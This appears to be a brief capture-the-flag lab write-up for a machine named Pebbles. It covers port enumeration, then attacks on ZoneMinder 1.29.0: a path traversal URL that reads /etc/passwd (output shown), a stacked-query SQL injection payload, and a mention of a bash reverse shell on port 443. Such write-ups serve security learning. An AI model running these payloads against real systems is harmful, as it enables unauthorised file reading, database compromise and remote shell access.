Pebbles

Enumeration

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)

ZoneMinder Console - Running - default v1.29.0

https://vulners.com/packetstorm/PACKETSTORM:140927

/zm/index.php?view=file&path=/../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
sally:x:1000:1000:Sally,,,:/home/sally:/bin/bash

https://www.exploit-db.com/exploits/41239

2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.

Saved as sqli.req

Access

Getting reverse shell

https://www.revshells.com/ - Bash 196 - 443 port - Reverse Shell

Last updated